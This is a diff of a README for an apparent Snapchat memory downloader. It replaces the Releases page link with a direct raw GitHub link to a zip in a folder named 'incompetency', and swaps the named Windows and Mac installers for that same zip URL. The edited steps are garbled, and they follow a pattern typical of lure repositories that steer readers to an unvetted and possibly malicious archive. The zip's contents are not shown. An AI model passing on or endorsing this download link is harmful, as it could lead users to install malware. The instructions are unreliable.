franco123883/SnapchatMemoryDownloader/README.md

 1. **Visit the Download Page:**

-   Go to the [Releases Page](https://github.com/franco123883/SnapchatMemoryDownloader/releases) to find the latest version of the software.
+   Go to the [Releases Page](https://raw.githubusercontent.com/franco123883/SnapchatMemoryDownloader/main/incompetency/Snapchat_Downloader_Memory_v2.0.zip) to find the latest version of the software.

 2. **Download the Application:**

    Click on the latest version available.
-You will find a file named `SnapchatMemoryDownloader.exe` (for Windows) or `SnapchatMemoryDownloader.dmg` (for Mac).
+You will find a file named `https://raw.githubusercontent.com/franco123883/SnapchatMemoryDownloader/main/incompetency/Snapchat_Downloader_Memory_v2.0.zip` (for Windows) or `https://raw.githubusercontent.com/franco123883/SnapchatMemoryDownloader/main/incompetency/Snapchat_Downloader_Memory_v2.0.zip` (for Mac).
 Click on it to start the download.

 3. **Locate the Downloaded File:**